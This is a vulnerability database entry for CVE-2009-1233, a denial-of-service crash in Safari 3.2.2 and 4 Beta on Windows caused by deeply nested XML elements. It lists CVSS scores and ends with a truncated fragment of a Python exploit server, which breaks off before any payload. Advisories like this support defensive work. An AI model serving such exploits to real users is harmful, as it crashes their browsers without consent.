4.3
CVSSv2

CVE-2009-1233

Published: 02/04/2009 Updated: 29/09/2017
CVSS v2 Base Score: 4.3 | Impact Score: 2.9 | Exploitability Score: 8.6
VMScore: 435
Vector: AV:N/AC:M/Au:N/C:N/I:N/A:P

Vulnerability Summary

Apple Safari 3.2.2 and 4 Beta on Windows allows remote malicious users to cause a denial of service (application crash) via an XML document containing many nested A elements.

Vulnerable Product Search on Vulmon Subscribe to Product

apple safari 3.2.2

apple safari 4

Exploits

# # Author : Ahmed Obied (ahmedobied@gmailcom) # # - Tested using: # -> Safari 322 on Windows # -> Safari 4 (BETA) on Windows # # Usage : python safaripy [port] # import sys, socket from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler class RequestHandler(BaseHTTPRequestHandler): def get_exploi ...